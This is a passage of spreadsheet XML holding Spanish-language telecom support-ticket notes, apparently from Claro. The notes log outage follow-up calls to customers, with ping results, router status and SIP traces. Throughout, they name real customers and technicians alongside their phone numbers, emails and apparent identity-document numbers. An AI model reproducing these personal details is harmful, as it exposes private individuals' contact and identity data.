    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.103.83.139 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1495 PACKET(S) RECEIVED
    0.33% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/6 MS</t>
  </si>
  <si>
    <t>ES NECESARIO AIGNAR RECURSOS PARA INSTALACION DE ETX PARA SUBSTITUCION DE CTC.
TECNICO EN CLIENTE FREDDY 51733906</t>
  </si>
  <si>
    <t>F4585709</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 11:40
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS | 671900138T | CMI - POLLO CAMPERO | C687 - 1 AVENIDA 7-62 ZONA 2 BARRIO SAN LUCAS LOCAL 23 Y 24 C.C. PRADERA PALIN ESCUINTLA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 629100056T | PAPA POLLO,  S.A. (XT)   | DIRECCION 20 CALLE 5-97 LOCAL B ZONA 10 GUATEMALA  FRENTE A UNA AGENCIA DE CARROS JAGUAR,
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TECNICOS:
JOSE ALBERO IXPATA TOJ                              608559   1660 02313 1503
MARLON ENRIQUE MUÑOZ ORELLANA     652515     1582 46500 1801
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4585710</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CONSUELO ALEMAN AL 78609911  INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE HA ESTADO MUY INESTABLE QUE CADA 2 HRS APROX LE DA EL INCONVENIENTE INDICA QUE ELLA SE ESTARA COMUNICANDO CUANDO LE VUELVA A DAR EL INCONVENIENTE O QUE SE LE LLAME EN 2 HRS NUEVAMENTE **
ID 3001568506
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CONSUELO ALEMAN AL 78609911 CONTESTA EL SEÑOR FRANKLIN PINEDA INDICA QUE NO LOGRA LLEGAR AL EQUIPO Y EN LA MAÑANA TUVO UNA CAIDA  || SE NOTIFICA A GESTOR **
ID 1001116250
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CONSUELO ALEMAN AL 78449381  CONTESTA EL SEÑOR JOSÉ PINEDA E INDICA QUE LE LLAME A LA SEÑORA CONSUEL AL 78609911  QUE ELLA ESTA EN MORAZAN **
ID 3001567715
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CONSUELO ALEMAN AL 78609911 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE PERO QUE ESTAN VERIFICANDO INTERNAMENTE Y SOLICITA QUE SE LE DEJE PENDIENTE PARA EL VIERNES A LAS 13:30 PM **
ID 3001649120
**</t>
  </si>
  <si>
    <t>F4585712</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO LOPEZ 78870256 MENCIONA QUE DESDE LA CENTRAL OBSERVAN EL SERVICIO CAIDO, SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO FUNCIONA CORRECTAMENTE
CLIENTE SOLICITA LAS PRUEBAS DE LA OPERATIVIDAD POR CORREO
-- GUILLERMO.LOPEZ@CONCENTRIX.COM --
-ID 3001553719</t>
  </si>
  <si>
    <t>F4585726</t>
  </si>
  <si>
    <t>SE VALIDA QUE AUN NO HAY RESPUESTA EN LA COLA DE CORREOS, SE PROCEDE A LLAMAR AL +52 55 5174 5290  ID 3001741014 ATIENDE SERGIO DONDE COMENTA QUE YA ESTA CERRADO YA QUE SE RESTABLECIÓ DE FORMA AUTOMÁTICA Y AUTORIZA EL CIERRE DEL TICKET, SE NOTIFICA AL GESTOR. ALEJANDRO.NAVARRO VIA SKYPE</t>
  </si>
  <si>
    <t>F4585734</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO SICA AL 55434500  INDICA QUE DE NUEVO TIENE CAIDO EL SERVICIO  || SE NOTIFICA A GESTOR**
ID 3001573138 - 3001574444
**</t>
  </si>
  <si>
    <t>CLIENTE SR. DIEGO SICA 55434500 CONECTO UNA PC DIRECTO AL ROUTER DE CLARO, SE VALIDO ENLACE SIMETRICO 37/37, SOLICITO DEJAR ENCENDIDOS LOS PUERTOS, VALIDA ENLACE OPERATIVO Y ESTABLE, SE PROCEDE AL CIERRE DEL INCIDENTE. ID: 3001587244. SE ADJUNTA EVIDENCIA
CC_COLEGIO_VALVERDE_GT_INTERNET_ZONA1#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/880600002T/_/
GI0/0/1                        DOWN           DOWN
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        DOWN           DOWN     LAN DEL CLIENTE
GI0/1/2                        DOWN           DOWN     LAN DEL CLIENTE
GI0/1/3                        DOWN           DOWN     LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DE CLIENTE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DIEGO SICA AL 55434500 NO CONTESTO IVR ENVIA A BUZON, ID: 3001578482.</t>
  </si>
  <si>
    <t xml:space="preserve">  ACTUALMENTE EN LLAMADA CON CLIENTE SR. DIEGO SICA 55434500 SE LE ESTA APOYANDO, SE DETERMINA PROBLEMA LAN ...
ENLACE CONTINUA OPERATIVO A NIVEL DE CLARO:
CC_COLEGIO_VALVERDE_GT_INTERNET_ZONA1#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.149.69.101
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/28/28 MS
CC_COLEGIO_VALVERDE_GT_INTERNET_ZONA1#PING 1.1.1.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.149.69.101
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 24/27/28 MS</t>
  </si>
  <si>
    <t>F4585756</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TANIA COMENTA QUE YA CUENTA CON SERVICIO
3001686155
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 1/06/2022 15:20:18</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HONEY LAZO AL 8206 2447 INDICA QUE ELLA YA REINICIO EL EQUIPO PERO NO LEVANTA || SE NOTIFICA A GESTOR **
ID 3001577360
**</t>
  </si>
  <si>
    <t>F4585766</t>
  </si>
  <si>
    <t>SE LLAMA AL CL JULIO AL 58796963 ID 3001627269 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE ESTA BIEN EN PROCEDER CON EL CIERRE DE LA FALLA SIN EMBARGO COMENTA BRYAN POITEVIN Y COMENTA QUE SE TENIA EN LINEA A DAVID QUIEN COMENTA QUE YA HIZO LAS PRUEBAS Y SIGUE SIN FUNCIONAR SE DEJO CON EL GESTOR EN LINEA NO SE CIERRA LA FALLA.</t>
  </si>
  <si>
    <t>F4585768</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRENDA SAPON AL 51980591 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001580846
**</t>
  </si>
  <si>
    <t>F4585769</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 3391-6853  CONTESTA EL SEÑOR BRYAN || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001581886
**</t>
  </si>
  <si>
    <t>F4585772</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REBECA LOPEZ 77432308 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001867074 - 3001867538</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE REBECA LOPEZ QUIEN VALIDA EL SERVICIO.
3001891124
COLA:
NOMBRE: A: 0050377432308
NÚMERO: 0050377432308
DURACIÓN: 0:00:29
ESTADO: CONECTADA
DETALLES: 0050377432308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 2/06/2022 13:07:58</t>
  </si>
  <si>
    <t>CLIENTE REBECA LOPEZ 77432308 REALIZA PRUEBAS CON EL E1 Y HASTA ESTE MOMENTO YA NO HA PRESENTADO INCONVENIENTES, SOLICITA SE LE LLAME MAÑANA A LAS 12 DEL MEDIO DÍA PARA VALIDAR. ID: 3001640488</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REBECA LOPEZ 73922911, SE LE SOLICITA APOYO PARA UBICAR EL EQUIPO DE CLARO</t>
  </si>
  <si>
    <t>CLIENTE REBECA LOPEZ 73922911 UBICA EQUIPO ASMI54L ALARMADO, INDICA QUE NO PUEDE REINICIARLO EN ESTE MOMENTO. CLIENTE INDICA QUE EL SERVICIO ESTÁ INESTABLE, HA PRESENTADO CAIDAS EN EL TRANSCURSO DE LA MAÑANA. DURANTE LA REVISIÓN SE OBSERVA QUE EL E1 LEVANTA Y CAE. SE ABRIRÁ WO
ID DE LLAMADA: 3001573872</t>
  </si>
  <si>
    <t>F4585778</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
MONICA YIREH CASTILLO POON
BUENOS DÍAS CARLOS,
DANDO SEGUIMIENTO A LA REVISIÓN DEL ESTADO DEL E1, LE COMENTAMOS QUE DESDE LA CENTRAL NUEVAMENTE ESTE CAÍDO.
QUISIÉRAMOS CONSULTARLE ACERCA DE LAS PRUEBAS EN SITIO SI YA FUERON REALIZADAS DE REINICIO Y VALIDACIÓN DE CABLEADO, EN DADO CASO YA FUERON REALIZADAS POR PERSONAL EN LA AGENCIA, ESTAREMOS COORDINANDO PERSONAL TÉCNICO A REVISAR NUEVAMENTE LOS EQUIPOS Y VALIDAR EL POR QUE DE LA CAÍDA.
SALUDOS,</t>
  </si>
  <si>
    <t>SE CONTACTA CON ROBERTO AGUILERA 0050431904892 PARA APOYO CON BRINDARNOS DATOS DEL PERSONAL QUE ESTARA APOYANDO EL DIA DE MAÑANA, INDICA QUE NOS BRINDARA LA INFORMACION EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA VALIDAR EL SERVICIO
SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADOS,
QUEDAMOS ATENTOS A LA VALIDACIÓN DEL FUNCIONAMIENTO DEL SERVICIO DE TELEFONÍA.
SALUDOS,</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA DE PRUEBA ENTRANTE AL GDN E INGRESA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>##SE ENVIA CORREO A CLIETNE ## EN ESPERA DE RESPUSTA##
MARIA ISABEL GODINEZ SAENZ
BUENA TARDE ESTIMADOS, FAVOR SU APOYO CON REALIZAR PRUEBAS Y VERIFICAR EL FUNCIONAMIENTO DEL SERVICIO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SR. DANILO PUERTO 94679411 PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
NOTA: EN LA INFORMACIÓN DE CONTACTO SE TIENE A CARLOS CERRATO PERO NO SE TIENE NUMERO PARA LOCALIZARLO
1001871066
COLA:
NOMBRE: A: 0050494679411
NÚMERO: 0050494679411
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:34
DETALLES: 0050494679411
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 17:42:37
1001871170
COLA:
NOMBRE: A: 0050494679411
NÚMERO: 0050494679411
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:24
DETALLES: 0050494679411
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 17:42:42</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CARLOS CERRATO QUIEN INDICA QUE YA POSEE LLAMADAS SALIENTES.
1001875174
COLA:
NOMBRE: A: 0050499271379
NÚMERO: 0050499271379
DURACIÓN: 0:00:45
ESTADO: CONECTADA
DETALLES: 0050499271379
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 18:02:01</t>
  </si>
  <si>
    <t>##CLIENTE INDICA QUE YA HA VERIFICADO, SE CONSULTA SI SE PUEDE PROCEDER AL CIERRE##
MUCHAS GRACIAS POR EL APOYO EN VERIFICAR, PODEMOS PROCEDER AL CIERRE DEL TICKET?
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;
JAVIER AGUILAR CASTRO &lt;JAGUILARC@BACCREDOMATIC.CR&gt;
BUENAS TARDES,
SE REALIZANRON LAS PRUEBAS, ACTUALMENTE ESTA ACTIVO Y EN USO OPERATIVO, GRACIAS POR LA AYUDA.
JAVIER AGUILAR C.
SHARED SERVICE CENTER REGIONAL
EXT. 50180
BAC | CREDOMATIC</t>
  </si>
  <si>
    <t>SE CONTACTA CON PERSONAL DE INGENIERIA  ROBERTO AGUILERA 0050431904892 PARA APOYO CON DARLE PRIORIDAD AL CLIENTE PARA SER EL PRIMERO DE MIGRAR LA SEMANA QUE VIENE, SIN EMBARGO NO SE TIENE RESPEUSTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  DANILO PUERTO 94679411  QUIEN INDICA QUE EN TGU ESTA   MARCO TULIO FLORES 9998-1885
3001639475
COLA:
NOMBRE: A: 0050494679411
NÚMERO: 0050494679411
DURACIÓN: 0:00:20
ESTADO: MARCANDO
DETALLES: 0050494679411
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 1/06/2022 12:52:48</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS, NO SE TIENE INFORMACION DE PARTE DEL CLIENTE</t>
  </si>
  <si>
    <t>SE CONTACTA CON ROBERTO AGUILERA 0050431904892
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4585782</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM REYES AL 9468-6048 INDICA QUE NO SE ENCUENTRA EN LA EMPRESA QUE SE LE LLAME A LAS 16:00 HRS **
ID 3001587582
**</t>
  </si>
  <si>
    <t>F4585788</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEMIMA HERNANDEZ AL 78530518  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001588769
**</t>
  </si>
  <si>
    <t>F4585794</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE CARLOS ROMUALDO 78856297 MENCIONA QUE SE ENCUENTRA EN UNA REUNION Y NO PUEDE ATENDER EN ESTE MOMENTO
-ID 1001008991</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE  CARLOS ROMUALDO 78856297 CONFIRMA SERVICIO ESTABLE Y OPERATIVO
AUTORIZA CIERRE DE TICKET **
IOD 1001096280
**</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE  CARLOS ROMUALDO 78856297  NO RESPONDE || SE INTENTARA LUEGO **
IOD 1001082955
**</t>
  </si>
  <si>
    <t>F4585795</t>
  </si>
  <si>
    <t>**SE LLAMA A MAGALY CANEL AL 53836448 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001646370
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369  NO RESPONDE, SE INTENTARA LUEGO **
ID 3001595051
**</t>
  </si>
  <si>
    <t>**SE LLAMA A MAGALY CANEL AL 53836448 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001624124
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369  CONTESTA EL SEÑOR BRYAN POCASANGRE CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
ID 3001646588
**</t>
  </si>
  <si>
    <t>F4585802</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SANTOS AMAYA 23461201 VALIDA EQUIPOS ENCENDIDOS Y APLICARON REINICIO, SOLICITAN REVISAR EL CABLEADO YA QUE ENLACE CUANDO LLEVUE PRESENTA LAS CAIDAS...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SANTOS AMAYA NO CONTESTA 74601000 ID: 3001610129.</t>
  </si>
  <si>
    <t>F4585805</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BELEN LOPEZ 57324835 MENCIONA QUE PERSISTE EL INCONVENIENTE, ADICIONAL INDICA QUE YA APLICARON REINICIO Y NO RESTABLECE
-ID 3001573564
NOMBRE DEL CLIENTE: MINISTERIO DE EDUCACION-
UBICACIÓN:INSTITUTO NACIONAL DE CEBACO A UN COSTADO OESTE
CONTACTO EN SITIO: BELEN LOPEZ 57324835
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE, SRITA BELEN COMENTA QUE SERVICIO OEPRATIVO
RESULTADO: LLAMADA HECHA
NOMBRE: 50557324835
NÚMERO: 50557324835
INICIO: HOY, 13:52
FIN: HOY, 13:53
DURACIÓN: 0:47
ID DE LLAMADA: 3001657827</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL MAURICIO GARCIA  87104453 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001618881
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL BELEN LOPEZ 57324835 NO RESPONDE SE INTENTARA LUEGO **
ID 3001618417
**</t>
  </si>
  <si>
    <t>F4585808</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLENDA VELASQUEZ 32267718  MENCIONA QUE YA RESTABLECIO EL SERVICIO
CLIENTE INDICA QUE PRESENTARON PROBLEMAS DE ENERGIA
-ID 3001578901</t>
  </si>
  <si>
    <t>F4585809</t>
  </si>
  <si>
    <t>INICIO 10:51
SE LE LLAMA A ENCARGADO DE TURNO 79465260 / 79465628 ID: 3001597099
ATIENDE LANDER, COMENTA QUE NO TENIA ENERGIA PERO YA LE ESTA FUNCIONANDO CORRECTAMENTE Y CORTA LLAMADA, SE LE NOTIFICA A LUVY.SANDOVAL VIA SKYPE, SE PROCEDE CON EL CIERRE DE INCIDENTE Y SE TERMINARA DE VALIDAR SD CON CENTRAL  | WIP
FIN 11:05</t>
  </si>
  <si>
    <t>F4585827</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TITO AL 3189-0995 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001653800
**</t>
  </si>
  <si>
    <t>F4585828</t>
  </si>
  <si>
    <t>SE LLAMA A 5B CONTESTA MOISES PACAJO INDICA QUE VE DESCARGADO EL UPS POR LO QUE INDICA QUE PROBLAMENTE ES TEMA DE ENERGIA.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:19
FIN: HOY, 17:22
DURACIÓN: 3:39
ID DE LLAMADA: 3001734700</t>
  </si>
  <si>
    <t>F4585841</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRIAN AZURDIA 46384260 MENCIONA QUE PERSISTE EL PROBLEMA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001583888</t>
  </si>
  <si>
    <t>F4585845</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 NO SE TIENE AUDIO ##  LLAMDAA QUEDA MUDA ##  SE LLLAMA TAMBIEN DESDE VIVO Y NO SE ESCCHA NADA ## SE PEDIRA APOYO A EQUIPO RETRO PARA QUE NOS AYUDEN A VALIDAR ##
3001845618
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 2/06/2022 11:05:19</t>
  </si>
  <si>
    <t>SE HA ENVIADO PRUEBAS A CLIENTE- SE PROCEDE AL CIERRE DEL CASO ##CLIENTE ESCALA A SU PROVEEDOR
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 12:11
PARA: EVELYN.SALAZAR@SLI.COM.SV &lt;EVELYN.SALAZAR@SLI.COM.SV&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 22396900 || S.L.I. ABOGADOS CONSULTORES S.A. DE C.V.
BUEN DÍA ESTIMADA, CON RESPECTO AL E1:
GDN 22396900
S.L.I. ABOGADOS CONSULTORES S.A. DE C.V.
SAN SALVADOR COL. MANUEL JOSE ARCE AVENIDA INFANTERIA 13 POL "C"
SEGÚN REPORTE: " DE MANERA ESPORÁDICA HAY MOMENTOS DONDE NO TIENEN LLAMADAS ENTRANTES NI SALIENTES". LE COMENTO, EL DÍA DE AYER POR LA TARDE QUE SE PRESENTO EL INCONVENIENTE, SE REALIZARON  TRAZAS Y SE OBSERVA QUE LA PBX ESTA LIBERANDO LAS LLAMADAS, A NIVEL DE CLARO EL SERVICIO LO OBSERVAMOS ACTIVO, SIN PROBLEMAS EN NUESTRA RED,  POR LO QUE SOLICITAMOS SU AMABLE APOYO PARA ESCALARLO CON SU PROVEEDOR DE PBX Y QUE PUEDAN VERIFICAR MÁS A FONDO LA PLANTA (ESTADO DE EQUIPO, TARJETA, CONFIGURACIONES).
ADJUNTO TRAZAS, DONDE OBSERVAMOS LAS LIBERACIONES POR PARTE DE PBX
SIP/2.0 408 REQUEST TIMEOUT
VIA: SIP/2.0/UDP
CALL-ID: I30JV0RJ8X2GRPRP0ZAXHAV8I3PJ8HX1@ATS.ZMLATS01.IMS.CLARO.COM.SV.12
FROM: &lt;SIP:+5030050222245388@10.144.85.12:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=JVRR1IPZ-CC-12-TRC-80484
TO: &lt;SIP:+50322396900@10.144.85.6:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=2Q13QRQS
CSEQ: 1 INVITE
WARNING: 399 10.189.91.37 "SS280000F114L932[00000] NO RESPONSE FROM NETWORK"
CONTENT-LENGTH: 0---- ACA SE OBSERVA LA LIBERACIÓN DE LA LLAMA POR PARTE DE PBX
CANCEL SIP:+50322396900@10.144.85.6:5060;TRANSPORT=UDP;USER=PHONE SIP/2.0
VIA: SIP/2.0/UDP
CALL-ID: F883KJI7MI84J3KH32FGL5375G41HK85@CGPV1R002SIPCOM
FROM: 50376441422 &lt;SIP:+50376441422@10.144.85.12:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=1F5KJL52-CC-1000
TO: 50322396900 &lt;SIP:+50322396900@10.144.85.6:5060;TRANSPORT=UDP;USER=PHONE&gt;
CSEQ: 1 CANCEL
MAX-FORWARDS: 70
REASON: Q.850;CAUSE=16;TEXT="NORMAL CALL CLEARING"
REASON: SIP;CAUSE=480;TEXT="TEMPORARILY UNAVAILABLE"---- ACA SE OBSERVA LA LIBERACIÓN DE LA LLAMA POR PARTE DE PBX
CONTENT-LENGTH: 0
FAVOR SU APOYO ESCALANDO CASO A SU PROVEEDOR DE PBX
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE HA LLAMADO VARIAS VECES A SEÑORITA EVELYN SALAZAR-76769577 PERO NO HAY AUDIO ##  SE REALIZA PRUEBAS CON OTROS E1 Y CLIENTES Y SI HAY AUDIO ##POSIBLEMENTE SE TENGA PROBLEMAS DE SEÑAL EN PR ##
##VIVO
##SE LLAMARON 3 VECES Y NO SE LOGRA ESCUCHAR A CLIENTE##</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE EVELYN SALAZAR-76769577  ##ENVIA A BUZON 3 VECES ##VIVO</t>
  </si>
  <si>
